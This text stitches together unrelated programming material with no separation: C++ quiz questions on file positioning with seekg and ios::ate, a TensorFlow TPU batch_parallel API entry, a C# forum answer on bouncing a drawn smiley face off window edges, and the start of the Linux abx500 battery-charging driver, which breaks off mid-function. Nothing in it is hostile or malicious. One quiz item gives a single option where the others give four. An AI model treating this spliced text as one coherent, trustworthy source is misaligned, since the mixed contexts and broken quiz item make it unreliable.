Which of the following is used to open a file for output and move the read/write control to the end of the file?
ios::ate
ios::at
ios::ann
ios::end
Answer: ios::ate
Which is the correct syntax to position n bytes from the end of fileObject?
fileObject.seekg(ios::end, n);
fileObject.seekg(n, ios:end );
fileObject.seekg(n, ios::end );
fileObject.seekg(ios:end, n);
Answer: fileObject.seekg(n, ios::end); (use a negative n to move back from the end)
How do you find the position at the end of fileObject?
fileObject.seekg( 0, ios::end );
Answer: fileObject.seekg( 0, ios::end );
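To tie several of these answers together, here is a small sketch exercising open(), is_open(), seekg() and eof(); the file name is illustrative:

#include <fstream>
#include <iostream>

int main() {
    std::fstream myfile;
    myfile.open("example.bin", std::ios::in | std::ios::out | std::ios::binary);
    if (!myfile.is_open())                 // is_open() returns bool
        return 1;

    myfile.seekg(0, std::ios::end);        // jump to the end of the stream
    std::streampos size = myfile.tellg();  // get position here == file size
    myfile.seekg(0, std::ios::beg);        // back to the beginning

    char c;
    while (myfile.get(c)) {
        // process one byte at a time
    }
    // after the loop, myfile.eof() is true: reading hit end-of-file
    std::cout << "size: " << size << ", eof: " << myfile.eof() << '\n';
    myfile.close();
    return 0;
}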
tf.compat.v1.tpu.batch_parallel
Shards computation along the batch dimension for parallel execution.
Convenience wrapper around shard().
inputs must be a list of Tensors or None (equivalent to an empty list). Each input is split into num_shards pieces along the 0-th dimension, and computation is applied to each shard in parallel.
Tensors are broadcast to all shards if they are lexically captured by computation. e.g.,
x = tf.constant(7)

def computation():
  return x + 3

... = shard(computation, ...)
The outputs from all shards are concatenated back together along their 0-th dimension.
Inputs and outputs of the computation must be at least rank-1 Tensors.
Args:
  computation: A Python function that builds a computation to apply to each shard of the input.
  inputs: A list of input tensors or None (equivalent to an empty list). The 0-th dimension of each Tensor must have size divisible by num_shards.
  num_shards: The number of shards.
  infeed_queue: If not None, the InfeedQueue from which to append a tuple of arguments as inputs to computation.
  device_assignment: If not None, a DeviceAssignment describing the mapping between logical cores in the computation with physical cores in the TPU topology. Uses a default device assignment if None. The DeviceAssignment may be omitted if each shard of the computation uses only one core, and there is either only one shard, or the number of shards is equal to the number of cores in the TPU system.
  name: (Deprecated) Does nothing.

Returns:
  A list of output tensors.

Raises:
  ValueError: If num_shards <= 0
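As a rough usage sketch (this assumes a configured TPU runtime; outside a TPU context the graph below will not actually execute):

import tensorflow.compat.v1 as tf

def computation(x):
    return x + 3.0

x = tf.placeholder(tf.float32, shape=[8, 4])  # batch of 8, split along dim 0

# Splits x into 2 shards, applies computation to each shard in parallel,
# then concatenates the per-shard outputs back along dimension 0.
[y] = tf.tpu.batch_parallel(computation, inputs=[x], num_shards=2)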
C# Question
Moving Smiling Face C#
Below I've created a program using C# that creates a smiley face. It also moves across the screen. I cannot figure out how to get the smiley face to bounce off the edges and around the screen. Please Help. Thank you.
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace HappyFace
{
public partial class HappyFace : Form
{
int xpos = 0;
int ypos = 0;
int width = 0;
int length = 0;
int startAngle = 45;
int sweepAngle = 90;
public HappyFace()
{
InitializeComponent();
}
private void HappyFace_Load(object sender, EventArgs e)
{
}
private void HappyFace_Paint(object sender, PaintEventArgs e)
{
Graphics g = e.Graphics;
Pen myPen = new Pen(Brushes.Red, 7);
Pen myPen2 = new Pen(Brushes.Green, 7);
//g.DrawLine(myPen, 0, 0, 500, 500);
//g.DrawLine(myPen, 0, 0, this.ClientRectangle.Width, this.ClientRectangle.Height);
//g.DrawLine(myPen2, 0, this.ClientRectangle.Height, this.ClientRectangle.Width, 0);
//g.DrawLine(myPen2, this.ClientRectangle.Left, this.ClientRectangle.Bottom, this.ClientRectangle.Right, ClientRectangle.Top);
int endX = this.ClientRectangle.Width;
int endY = this.ClientRectangle.Height;
//string msg = String.Format("endX = {0} endY = {1}", endX, endY);
//MessageBox.Show(msg);
int xCenter = this.ClientRectangle.Left + (this.ClientRectangle.Width / 2);
int yCenter = this.ClientRectangle.Top + (this.ClientRectangle.Height / 2);
Pen circlePen = new Pen(Brushes.Black, 9);
//g.DrawEllipse(circlePen, xCenter - 50, yCenter - 50, 100, 100);
// g.FillEllipse(Brushes.Orange, xCenter -50, yCenter - 50, 100, 100);
Font myFont = new Font("Monotype Corsiva", 43, FontStyle.Bold);
g.DrawString("Happy Face", myFont, Brushes.Aqua, 300, 25);
//g.DrawArc(circlePen, xpos, width, length, startAngle, sweepAngle);
g.DrawEllipse(circlePen, xpos, ypos + 130, 250, 250);
g.FillEllipse(Brushes.PeachPuff, xpos, ypos + 130, 250, 250);
g.DrawEllipse(circlePen, xpos + 65, ypos + 200, 20, 35);
g.FillEllipse(Brushes.Black, xpos + 65, ypos + 200, 20, 35);
g.DrawEllipse(circlePen, xpos + 160, ypos + 200, 20, 35);
g.FillEllipse(Brushes.Black, xpos + 160, ypos + 200, 20, 35);
g.DrawArc(circlePen, xpos + 60, ypos + 215, 130, 120, 35, 115);
}
private void timer1_Tick(object sender, EventArgs e)
{
xpos = xpos + 3;
if(xpos >= this.ClientRectangle.Right - 250)
{
xpos = 0;
}
this.Invalidate();
}
}
}
Answer
Well, I was a bit bored. I'll assume that the object is going to move in a 45-degree trajectory, and that when it collides with the bounds it changes direction by 90°.
What I would do (this is a very simple solution) is, first of all, define the direction on both axes in which I want the "smiley" to move, the step for each timer tick, the position of the center, and the size of the object, something like:
int xpos = 0;
int ypos = 130;
int step = 10;
int width = 250;
int height = 250;
int directionX = +1;
int directionY = -1;
The timer would just increase the x and y positions:
private void timer1_Tick(object sender, EventArgs e)
{
xpos += 10*directionX;
ypos += 10*directionY;
checkBounds(); //This would check if the object collides with the bounds
this.Invalidate();
}
The checkBounds method check if the object collides with the bounds:
private void checkBounds()
{
if (ypos < 0 + step || ypos + height+ step > ClientRectangle.Height)
{
directionY *= -1;
}
if (xpos < 0 + step || xpos + width + step > ClientRectangle.Width)
{
directionX *= -1;
}
}
Finally, the Paint method is similar to yours, just adjusting some values:
private void Form2_Paint(object sender, PaintEventArgs e)
{
Graphics g = e.Graphics;
Pen myPen = new Pen(Brushes.Red, 7);
Pen myPen2 = new Pen(Brushes.Green, 7);
int endX = this.ClientRectangle.Width;
int endY = this.ClientRectangle.Height;
int xCenter = this.ClientRectangle.Left + (this.ClientRectangle.Width / 2);
int yCenter = this.ClientRectangle.Top + (this.ClientRectangle.Height / 2);
Pen circlePen = new Pen(Brushes.Black, 9);
Font myFont = new Font("Monotype Corsiva", 43, FontStyle.Bold);
g.DrawString("Happy Face", myFont, Brushes.Aqua, 300, 25);
g.DrawEllipse(circlePen, xpos, ypos, 250, 250);
g.FillEllipse(Brushes.PeachPuff, xpos, ypos, 250, 250);
g.DrawEllipse(circlePen, xpos + 65, ypos -130 + 200, 20, 35);
g.FillEllipse(Brushes.Black, xpos + 65, ypos-130 + 200, 20, 35);
g.DrawEllipse(circlePen, xpos + 160, ypos-130 + 200, 20, 35);
g.FillEllipse(Brushes.Black, xpos + 160, ypos-130 + 200, 20, 35);
g.DrawArc(circlePen, xpos + 60, ypos-130 + 215, 130, 120, 35, 115);
}
This code could be improved a lot, but it may help you think about how it should be done. Hope it helps.
Linux/drivers/power/abx500_chargalg.c
1 /*
2 * Copyright (C) ST-Ericsson SA 2012
3 * Copyright (c) 2012 Sony Mobile Communications AB
4 *
5 * Charging algorithm driver for abx500 variants
6 *
7 * License Terms: GNU General Public License v2
8 * Authors:
9 * Johan Palsson <[email protected]>
10 * Karl Komierowski <[email protected]>
11 * Arun R Murthy <[email protected]>
12 * Author: Imre Sunyi <[email protected]>
13 */
14
15 #include <linux/init.h>
16 #include <linux/module.h>
17 #include <linux/device.h>
18 #include <linux/hrtimer.h>
19 #include <linux/interrupt.h>
20 #include <linux/delay.h>
21 #include <linux/slab.h>
22 #include <linux/platform_device.h>
23 #include <linux/power_supply.h>
24 #include <linux/completion.h>
25 #include <linux/workqueue.h>
26 #include <linux/kobject.h>
27 #include <linux/of.h>
28 #include <linux/mfd/core.h>
29 #include <linux/mfd/abx500.h>
30 #include <linux/mfd/abx500/ab8500.h>
31 #include <linux/mfd/abx500/ux500_chargalg.h>
32 #include <linux/mfd/abx500/ab8500-bm.h>
33 #include <linux/notifier.h>
34
35 /* Watchdog kick interval */
36 #define CHG_WD_INTERVAL (6 * HZ)
37
38 /* End-of-charge criteria counter */
39 #define EOC_COND_CNT 10
40
41 /* One hour expressed in seconds */
42 #define ONE_HOUR_IN_SECONDS 3600
43
44 /* Five minutes expressed in seconds */
45 #define FIVE_MINUTES_IN_SECONDS 300
46
47 /* Plus margin for the low battery threshold */
48 #define BAT_PLUS_MARGIN (100)
49
50 #define CHARGALG_CURR_STEP_LOW 0
51 #define CHARGALG_CURR_STEP_HIGH 100
52
53 enum abx500_chargers {
54 NO_CHG,
55 AC_CHG,
56 USB_CHG,
57 };
58
59 struct abx500_chargalg_charger_info {
60 enum abx500_chargers conn_chg;
61 enum abx500_chargers prev_conn_chg;
62 enum abx500_chargers online_chg;
63 enum abx500_chargers prev_online_chg;
64 enum abx500_chargers charger_type;
65 bool usb_chg_ok;
66 bool ac_chg_ok;
67 int usb_volt;
68 int usb_curr;
69 int ac_volt;
70 int ac_curr;
71 int usb_vset;
72 int usb_iset;
73 int ac_vset;
74 int ac_iset;
75 };
76
77 struct abx500_chargalg_suspension_status {
78 bool suspended_change;
79 bool ac_suspended;
80 bool usb_suspended;
81 };
82
83 struct abx500_chargalg_current_step_status {
84 bool curr_step_change;
85 int curr_step;
86 };
87
88 struct abx500_chargalg_battery_data {
89 int temp;
90 int volt;
91 int avg_curr;
92 int inst_curr;
93 int percent;
94 };
95
96 enum abx500_chargalg_states {
97 STATE_HANDHELD_INIT,
98 STATE_HANDHELD,
99 STATE_CHG_NOT_OK_INIT,
100 STATE_CHG_NOT_OK,
101 STATE_HW_TEMP_PROTECT_INIT,
102 STATE_HW_TEMP_PROTECT,
103 STATE_NORMAL_INIT,
104 STATE_USB_PP_PRE_CHARGE,
105 STATE_NORMAL,
106 STATE_WAIT_FOR_RECHARGE_INIT,
107 STATE_WAIT_FOR_RECHARGE,
108 STATE_MAINTENANCE_A_INIT,
109 STATE_MAINTENANCE_A,
110 STATE_MAINTENANCE_B_INIT,
111 STATE_MAINTENANCE_B,
112 STATE_TEMP_UNDEROVER_INIT,
113 STATE_TEMP_UNDEROVER,
114 STATE_TEMP_LOWHIGH_INIT,
115 STATE_TEMP_LOWHIGH,
116 STATE_SUSPENDED_INIT,
117 STATE_SUSPENDED,
118 STATE_OVV_PROTECT_INIT,
119 STATE_OVV_PROTECT,
120 STATE_SAFETY_TIMER_EXPIRED_INIT,
121 STATE_SAFETY_TIMER_EXPIRED,
122 STATE_BATT_REMOVED_INIT,
123 STATE_BATT_REMOVED,
124 STATE_WD_EXPIRED_INIT,
125 STATE_WD_EXPIRED,
126 };
127
128 static const char *states[] = {
129 "HANDHELD_INIT",
130 "HANDHELD",
131 "CHG_NOT_OK_INIT",
132 "CHG_NOT_OK",
133 "HW_TEMP_PROTECT_INIT",
134 "HW_TEMP_PROTECT",
135 "NORMAL_INIT",
136 "USB_PP_PRE_CHARGE",
137 "NORMAL",
138 "WAIT_FOR_RECHARGE_INIT",
139 "WAIT_FOR_RECHARGE",
140 "MAINTENANCE_A_INIT",
141 "MAINTENANCE_A",
142 "MAINTENANCE_B_INIT",
143 "MAINTENANCE_B",
144 "TEMP_UNDEROVER_INIT",
145 "TEMP_UNDEROVER",
146 "TEMP_LOWHIGH_INIT",
147 "TEMP_LOWHIGH",
148 "SUSPENDED_INIT",
149 "SUSPENDED",
150 "OVV_PROTECT_INIT",
151 "OVV_PROTECT",
152 "SAFETY_TIMER_EXPIRED_INIT",
153 "SAFETY_TIMER_EXPIRED",
154 "BATT_REMOVED_INIT",
155 "BATT_REMOVED",
156 "WD_EXPIRED_INIT",
157 "WD_EXPIRED",
158 };
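/*
 * Editor's note: this array is index-matched to enum
 * abx500_chargalg_states above; abx500_chargalg_state_to() uses
 * states[di->charge_state] for logging, so the two must be kept in
 * sync whenever a state is added or removed.
 */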
159
160 struct abx500_chargalg_events {
161 bool batt_unknown;
162 bool mainextchnotok;
163 bool batt_ovv;
164 bool batt_rem;
165 bool btemp_underover;
166 bool btemp_lowhigh;
167 bool main_thermal_prot;
168 bool usb_thermal_prot;
169 bool main_ovv;
170 bool vbus_ovv;
171 bool usbchargernotok;
172 bool safety_timer_expired;
173 bool maintenance_timer_expired;
174 bool ac_wd_expired;
175 bool usb_wd_expired;
176 bool ac_cv_active;
177 bool usb_cv_active;
178 bool vbus_collapsed;
179 };
180
181 /**
182 * struct abx500_charge_curr_maximization - Charger maximization parameters
183 * @original_iset: the non optimized/maximised charger current
184 * @current_iset: the charging current used at this moment
185 * @test_delta_i: the delta between the current we want to charge and the
186 current that is really going into the battery
187 * @condition_cnt: number of iterations needed before a new charger current
188 is set
189 * @max_current: maximum charger current
190 * @wait_cnt: to avoid too fast current step down in case of charger
191 * voltage collapse, we insert this delay between step
192 * down
193 * @level: tells in how many steps the charging current has been
194 increased
195 */
196 struct abx500_charge_curr_maximization {
197 int original_iset;
198 int current_iset;
199 int test_delta_i;
200 int condition_cnt;
201 int max_current;
202 int wait_cnt;
203 u8 level;
204 };
205
206 enum maxim_ret {
207 MAXIM_RET_NOACTION,
208 MAXIM_RET_CHANGE,
209 MAXIM_RET_IBAT_TOO_HIGH,
210 };
211
212 /**
213 * struct abx500_chargalg - abx500 Charging algorithm device information
214 * @dev: pointer to the structure device
215 * @charge_status: battery operating status
216 * @eoc_cnt:		counter used to determine end-of-charge
217 * @maintenance_chg: indicate if maintenance charge is active
218 * @t_hyst_norm temperature hysteresis when the temperature has been
219 * over or under normal limits
220 * @t_hyst_lowhigh temperature hysteresis when the temperature has been
221 * over or under the high or low limits
222 * @charge_state: current state of the charging algorithm
223 * @ccm charging current maximization parameters
224 * @chg_info: information about connected charger types
225 * @batt_data: data of the battery
226 * @susp_status: current charger suspension status
227 * @bm: Platform specific battery management information
228 * @curr_status: Current step status for over-current protection
229 * @parent: pointer to the struct abx500
230 * @chargalg_psy: structure that holds the battery properties exposed by
231 * the charging algorithm
232 * @events: structure for information about events triggered
233 * @chargalg_wq: work queue for running the charging algorithm
234 * @chargalg_periodic_work: work to run the charging algorithm periodically
235 * @chargalg_wd_work: work to kick the charger watchdog periodically
236 * @chargalg_work: work to run the charging algorithm instantly
237 * @safety_timer: charging safety timer
238 * @maintenance_timer: maintenance charging timer
239 * @chargalg_kobject: structure of type kobject
240 */
241 struct abx500_chargalg {
242 struct device *dev;
243 int charge_status;
244 int eoc_cnt;
245 bool maintenance_chg;
246 int t_hyst_norm;
247 int t_hyst_lowhigh;
248 enum abx500_chargalg_states charge_state;
249 struct abx500_charge_curr_maximization ccm;
250 struct abx500_chargalg_charger_info chg_info;
251 struct abx500_chargalg_battery_data batt_data;
252 struct abx500_chargalg_suspension_status susp_status;
253 struct ab8500 *parent;
254 struct abx500_chargalg_current_step_status curr_status;
255 struct abx500_bm_data *bm;
256 struct power_supply *chargalg_psy;
257 struct ux500_charger *ac_chg;
258 struct ux500_charger *usb_chg;
259 struct abx500_chargalg_events events;
260 struct workqueue_struct *chargalg_wq;
261 struct delayed_work chargalg_periodic_work;
262 struct delayed_work chargalg_wd_work;
263 struct work_struct chargalg_work;
264 struct hrtimer safety_timer;
265 struct hrtimer maintenance_timer;
266 struct kobject chargalg_kobject;
267 };
268
269 /*External charger prepare notifier*/
270 BLOCKING_NOTIFIER_HEAD(charger_notifier_list);
271
272 /* Main battery properties */
273 static enum power_supply_property abx500_chargalg_props[] = {
274 POWER_SUPPLY_PROP_STATUS,
275 POWER_SUPPLY_PROP_HEALTH,
276 };
277
278 struct abx500_chargalg_sysfs_entry {
279 struct attribute attr;
280 ssize_t (*show)(struct abx500_chargalg *, char *);
281 ssize_t (*store)(struct abx500_chargalg *, const char *, size_t);
282 };
283
284 /**
285 * abx500_chargalg_safety_timer_expired() - Expiration of the safety timer
286 * @timer: pointer to the hrtimer structure
287 *
288 * This function gets called when the safety timer for the charger
289 * expires
290 */
291 static enum hrtimer_restart
292 abx500_chargalg_safety_timer_expired(struct hrtimer *timer)
293 {
294 struct abx500_chargalg *di = container_of(timer, struct abx500_chargalg,
295 safety_timer);
296 dev_err(di->dev, "Safety timer expired\n");
297 di->events.safety_timer_expired = true;
298
299 /* Trigger execution of the algorithm instantly */
300 queue_work(di->chargalg_wq, &di->chargalg_work);
301
302 return HRTIMER_NORESTART;
303 }
304
305 /**
306 * abx500_chargalg_maintenance_timer_expired() - Expiration of
307 * the maintenance timer
308 * @timer: pointer to the timer structure
309 *
310 * This function gets called when the maintenance timer
311 * expires
312 */
313 static enum hrtimer_restart
314 abx500_chargalg_maintenance_timer_expired(struct hrtimer *timer)
315 {
316
317 struct abx500_chargalg *di = container_of(timer, struct abx500_chargalg,
318 maintenance_timer);
319
320 dev_dbg(di->dev, "Maintenance timer expired\n");
321 di->events.maintenance_timer_expired = true;
322
323 /* Trigger execution of the algorithm instantly */
324 queue_work(di->chargalg_wq, &di->chargalg_work);
325
326 return HRTIMER_NORESTART;
327 }
328
329 /**
330 * abx500_chargalg_state_to() - Change charge state
331 * @di: pointer to the abx500_chargalg structure
332 *
333 * This function gets called when a charge state change should occur
334 */
335 static void abx500_chargalg_state_to(struct abx500_chargalg *di,
336 enum abx500_chargalg_states state)
337 {
338 dev_dbg(di->dev,
339 "State changed: %s (From state: [%d] %s =to=> [%d] %s )\n",
340 di->charge_state == state ? "NO" : "YES",
341 di->charge_state,
342 states[di->charge_state],
343 state,
344 states[state]);
345
346 di->charge_state = state;
347 }
348
349 static int abx500_chargalg_check_charger_enable(struct abx500_chargalg *di)
350 {
351 switch (di->charge_state) {
352 case STATE_NORMAL:
353 case STATE_MAINTENANCE_A:
354 case STATE_MAINTENANCE_B:
355 break;
356 default:
357 return 0;
358 }
359
360 if (di->chg_info.charger_type & USB_CHG) {
361 return di->usb_chg->ops.check_enable(di->usb_chg,
362 di->bm->bat_type[di->bm->batt_id].normal_vol_lvl,
363 di->bm->bat_type[di->bm->batt_id].normal_cur_lvl);
364 } else if ((di->chg_info.charger_type & AC_CHG) &&
365 !(di->ac_chg->external)) {
366 return di->ac_chg->ops.check_enable(di->ac_chg,
367 di->bm->bat_type[di->bm->batt_id].normal_vol_lvl,
368 di->bm->bat_type[di->bm->batt_id].normal_cur_lvl);
369 }
370 return 0;
371 }
372
373 /**
374 * abx500_chargalg_check_charger_connection() - Check charger connection change
375 * @di: pointer to the abx500_chargalg structure
376 *
377 * This function will check if there is a change in the charger connection
378 * and change charge state accordingly. AC has precedence over USB.
379 */
380 static int abx500_chargalg_check_charger_connection(struct abx500_chargalg *di)
381 {
382 if (di->chg_info.conn_chg != di->chg_info.prev_conn_chg ||
383 di->susp_status.suspended_change) {
384 /*
385 * Charger state changed or suspension
386 * has changed since last update
387 */
388 if ((di->chg_info.conn_chg & AC_CHG) &&
389 !di->susp_status.ac_suspended) {
390 dev_dbg(di->dev, "Charging source is AC\n");
391 if (di->chg_info.charger_type != AC_CHG) {
392 di->chg_info.charger_type = AC_CHG;
393 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
394 }
395 } else if ((di->chg_info.conn_chg & USB_CHG) &&
396 !di->susp_status.usb_suspended) {
397 dev_dbg(di->dev, "Charging source is USB\n");
398 di->chg_info.charger_type = USB_CHG;
399 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
400 } else if (di->chg_info.conn_chg &&
401 (di->susp_status.ac_suspended ||
402 di->susp_status.usb_suspended)) {
403 dev_dbg(di->dev, "Charging is suspended\n");
404 di->chg_info.charger_type = NO_CHG;
405 abx500_chargalg_state_to(di, STATE_SUSPENDED_INIT);
406 } else {
407 dev_dbg(di->dev, "Charging source is OFF\n");
408 di->chg_info.charger_type = NO_CHG;
409 abx500_chargalg_state_to(di, STATE_HANDHELD_INIT);
410 }
411 di->chg_info.prev_conn_chg = di->chg_info.conn_chg;
412 di->susp_status.suspended_change = false;
413 }
414 return di->chg_info.conn_chg;
415 }
416
417 /**
418 * abx500_chargalg_check_current_step_status() - Check charging current
419 * step status.
420 * @di: pointer to the abx500_chargalg structure
421 *
422 * This function will check if there is a change in the charging current step
423 * and change charge state accordingly.
424 */
425 static void abx500_chargalg_check_current_step_status
426 (struct abx500_chargalg *di)
427 {
428 if (di->curr_status.curr_step_change)
429 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
430 di->curr_status.curr_step_change = false;
431 }
432
433 /**
434 * abx500_chargalg_start_safety_timer() - Start charging safety timer
435 * @di: pointer to the abx500_chargalg structure
436 *
437 * The safety timer is used to avoid overcharging of old or bad batteries.
438 * There are different timers for AC and USB
439 */
440 static void abx500_chargalg_start_safety_timer(struct abx500_chargalg *di)
441 {
442 	/* Charger-dependent expiration time in hours */
443 int timer_expiration = 0;
444
445 switch (di->chg_info.charger_type) {
446 case AC_CHG:
447 timer_expiration = di->bm->main_safety_tmr_h;
448 break;
449
450 case USB_CHG:
451 timer_expiration = di->bm->usb_safety_tmr_h;
452 break;
453
454 default:
455 dev_err(di->dev, "Unknown charger to charge from\n");
456 break;
457 }
458
459 di->events.safety_timer_expired = false;
460 hrtimer_set_expires_range(&di->safety_timer,
461 ktime_set(timer_expiration * ONE_HOUR_IN_SECONDS, 0),
462 ktime_set(FIVE_MINUTES_IN_SECONDS, 0));
463 hrtimer_start_expires(&di->safety_timer, HRTIMER_MODE_REL);
464 }
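/*
 * Editor's note: a worked example with a hypothetical platform value.
 * If main_safety_tmr_h were 4, the expiry would be set to
 * 4 * ONE_HOUR_IN_SECONDS = 14400 s, with a FIVE_MINUTES_IN_SECONDS
 * (300 s) slack range that lets the hrtimer core coalesce the wakeup.
 */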
465
466 /**
467 * abx500_chargalg_stop_safety_timer() - Stop charging safety timer
468 * @di: pointer to the abx500_chargalg structure
469 *
470 * The safety timer is stopped whenever the NORMAL state is exited
471 */
472 static void abx500_chargalg_stop_safety_timer(struct abx500_chargalg *di)
473 {
474 if (hrtimer_try_to_cancel(&di->safety_timer) >= 0)
475 di->events.safety_timer_expired = false;
476 }
477
478 /**
479 * abx500_chargalg_start_maintenance_timer() - Start charging maintenance timer
480 * @di: pointer to the abx500_chargalg structure
481 * @duration:	duration of the maintenance timer in hours
482 *
483 * The maintenance timer is used to maintain the charge in the battery once
484 * the battery is considered full. These timers are chosen to match the
485 * discharge curve of the battery
486 */
487 static void abx500_chargalg_start_maintenance_timer(struct abx500_chargalg *di,
488 int duration)
489 {
490 hrtimer_set_expires_range(&di->maintenance_timer,
491 ktime_set(duration * ONE_HOUR_IN_SECONDS, 0),
492 ktime_set(FIVE_MINUTES_IN_SECONDS, 0));
493 di->events.maintenance_timer_expired = false;
494 hrtimer_start_expires(&di->maintenance_timer, HRTIMER_MODE_REL);
495 }
496
497 /**
498 * abx500_chargalg_stop_maintenance_timer() - Stop maintenance timer
499 * @di: pointer to the abx500_chargalg structure
500 *
501 * The maintenance timer is stopped whenever maintenance ends or when another
502 * state is entered
503 */
504 static void abx500_chargalg_stop_maintenance_timer(struct abx500_chargalg *di)
505 {
506 if (hrtimer_try_to_cancel(&di->maintenance_timer) >= 0)
507 di->events.maintenance_timer_expired = false;
508 }
509
510 /**
511 * abx500_chargalg_kick_watchdog() - Kick charger watchdog
512 * @di: pointer to the abx500_chargalg structure
513 *
514 * The charger watchdog has to be kicked periodically whenever the charger is
515 * on, else the ABB will reset the system
516 */
517 static int abx500_chargalg_kick_watchdog(struct abx500_chargalg *di)
518 {
519 /* Check if charger exists and kick watchdog if charging */
520 if (di->ac_chg && di->ac_chg->ops.kick_wd &&
521 di->chg_info.online_chg & AC_CHG) {
522 /*
523 * If AB charger watchdog expired, pm2xxx charging
524 * gets disabled. To be safe, kick both AB charger watchdog
525 * and pm2xxx watchdog.
526 */
527 if (di->ac_chg->external &&
528 di->usb_chg && di->usb_chg->ops.kick_wd)
529 di->usb_chg->ops.kick_wd(di->usb_chg);
530
531 return di->ac_chg->ops.kick_wd(di->ac_chg);
532 }
533 else if (di->usb_chg && di->usb_chg->ops.kick_wd &&
534 di->chg_info.online_chg & USB_CHG)
535 return di->usb_chg->ops.kick_wd(di->usb_chg);
536
537 return -ENXIO;
538 }
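/*
 * Editor's note: abx500_chargalg_wd_work() below re-queues itself every
 * CHG_WD_INTERVAL (6 * HZ, i.e. every 6 seconds), which is intended to
 * land comfortably inside the hardware watchdog timeout; -ENXIO is
 * returned when no online charger implements kick_wd.
 */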
539
540 /**
541 * abx500_chargalg_ac_en() - Turn on/off the AC charger
542 * @di: pointer to the abx500_chargalg structure
543 * @enable: charger on/off
544 * @vset: requested charger output voltage
545 * @iset: requested charger output current
546 *
547 * The AC charger will be turned on/off with the requested charge voltage and
548 * current
549 */
550 static int abx500_chargalg_ac_en(struct abx500_chargalg *di, int enable,
551 int vset, int iset)
552 {
553 static int abx500_chargalg_ex_ac_enable_toggle;
554
555 if (!di->ac_chg || !di->ac_chg->ops.enable)
556 return -ENXIO;
557
558 /* Select maximum of what both the charger and the battery supports */
559 if (di->ac_chg->max_out_volt)
560 vset = min(vset, di->ac_chg->max_out_volt);
561 if (di->ac_chg->max_out_curr)
562 iset = min(iset, di->ac_chg->max_out_curr);
563
564 di->chg_info.ac_iset = iset;
565 di->chg_info.ac_vset = vset;
566
567 /* Enable external charger */
568 if (enable && di->ac_chg->external &&
569 !abx500_chargalg_ex_ac_enable_toggle) {
570 blocking_notifier_call_chain(&charger_notifier_list,
571 0, di->dev);
572 abx500_chargalg_ex_ac_enable_toggle++;
573 }
574
575 return di->ac_chg->ops.enable(di->ac_chg, enable, vset, iset);
576 }
577
578 /**
579 * abx500_chargalg_usb_en() - Turn on/off the USB charger
580 * @di: pointer to the abx500_chargalg structure
581 * @enable: charger on/off
582 * @vset: requested charger output voltage
583 * @iset: requested charger output current
584 *
585 * The USB charger will be turned on/off with the requested charge voltage and
586 * current
587 */
588 static int abx500_chargalg_usb_en(struct abx500_chargalg *di, int enable,
589 int vset, int iset)
590 {
591 if (!di->usb_chg || !di->usb_chg->ops.enable)
592 return -ENXIO;
593
594 /* Select maximum of what both the charger and the battery supports */
595 if (di->usb_chg->max_out_volt)
596 vset = min(vset, di->usb_chg->max_out_volt);
597 if (di->usb_chg->max_out_curr)
598 iset = min(iset, di->usb_chg->max_out_curr);
599
600 di->chg_info.usb_iset = iset;
601 di->chg_info.usb_vset = vset;
602
603 return di->usb_chg->ops.enable(di->usb_chg, enable, vset, iset);
604 }
605
606 /**
607 * ab8540_chargalg_usb_pp_en() - Enable/disable USB power path
608 * @di: pointer to the abx500_chargalg structure
609 * @enable: power path enable/disable
610 *
611 * The USB power path will be enabled/disabled
612 */
613 static int ab8540_chargalg_usb_pp_en(struct abx500_chargalg *di, bool enable)
614 {
615 if (!di->usb_chg || !di->usb_chg->ops.pp_enable)
616 return -ENXIO;
617
618 return di->usb_chg->ops.pp_enable(di->usb_chg, enable);
619 }
620
621 /**
622 * ab8540_chargalg_usb_pre_chg_en() - Enable/disable USB pre-charge
623 * @di: pointer to the abx500_chargalg structure
624 * @enable: USB pre-charge enable/disable
625 *
626 * The USB pre-charge will be enabled/disabled
627 */
628 static int ab8540_chargalg_usb_pre_chg_en(struct abx500_chargalg *di,
629 bool enable)
630 {
631 if (!di->usb_chg || !di->usb_chg->ops.pre_chg_enable)
632 return -ENXIO;
633
634 return di->usb_chg->ops.pre_chg_enable(di->usb_chg, enable);
635 }
636
637 /**
638 * abx500_chargalg_update_chg_curr() - Update charger current
639 * @di: pointer to the abx500_chargalg structure
640 * @iset: requested charger output current
641 *
642 * The charger output current will be updated for the charger
643 * that is currently in use
644 */
645 static int abx500_chargalg_update_chg_curr(struct abx500_chargalg *di,
646 int iset)
647 {
648 /* Check if charger exists and update current if charging */
649 if (di->ac_chg && di->ac_chg->ops.update_curr &&
650 di->chg_info.charger_type & AC_CHG) {
651 /*
652 * Select maximum of what both the charger
653 * and the battery supports
654 */
655 if (di->ac_chg->max_out_curr)
656 iset = min(iset, di->ac_chg->max_out_curr);
657
658 di->chg_info.ac_iset = iset;
659
660 return di->ac_chg->ops.update_curr(di->ac_chg, iset);
661 } else if (di->usb_chg && di->usb_chg->ops.update_curr &&
662 di->chg_info.charger_type & USB_CHG) {
663 /*
664 * Select maximum of what both the charger
665 * and the battery supports
666 */
667 if (di->usb_chg->max_out_curr)
668 iset = min(iset, di->usb_chg->max_out_curr);
669
670 di->chg_info.usb_iset = iset;
671
672 return di->usb_chg->ops.update_curr(di->usb_chg, iset);
673 }
674
675 return -ENXIO;
676 }
677
678 /**
679 * abx500_chargalg_stop_charging() - Stop charging
680 * @di: pointer to the abx500_chargalg structure
681 *
682 * This function is called from any state where charging should be stopped.
683 * All charging is disabled and all status parameters and timers are changed
684 * accordingly
685 */
686 static void abx500_chargalg_stop_charging(struct abx500_chargalg *di)
687 {
688 abx500_chargalg_ac_en(di, false, 0, 0);
689 abx500_chargalg_usb_en(di, false, 0, 0);
690 abx500_chargalg_stop_safety_timer(di);
691 abx500_chargalg_stop_maintenance_timer(di);
692 di->charge_status = POWER_SUPPLY_STATUS_NOT_CHARGING;
693 di->maintenance_chg = false;
694 cancel_delayed_work(&di->chargalg_wd_work);
695 power_supply_changed(di->chargalg_psy);
696 }
697
698 /**
699 * abx500_chargalg_hold_charging() - Pauses charging
700 * @di: pointer to the abx500_chargalg structure
701 *
702 * This function is called in the case where maintenance charging has been
703 * disabled and instead a battery voltage mode is entered to check when the
704 * battery voltage has reached a certain recharge voltage
705 */
706 static void abx500_chargalg_hold_charging(struct abx500_chargalg *di)
707 {
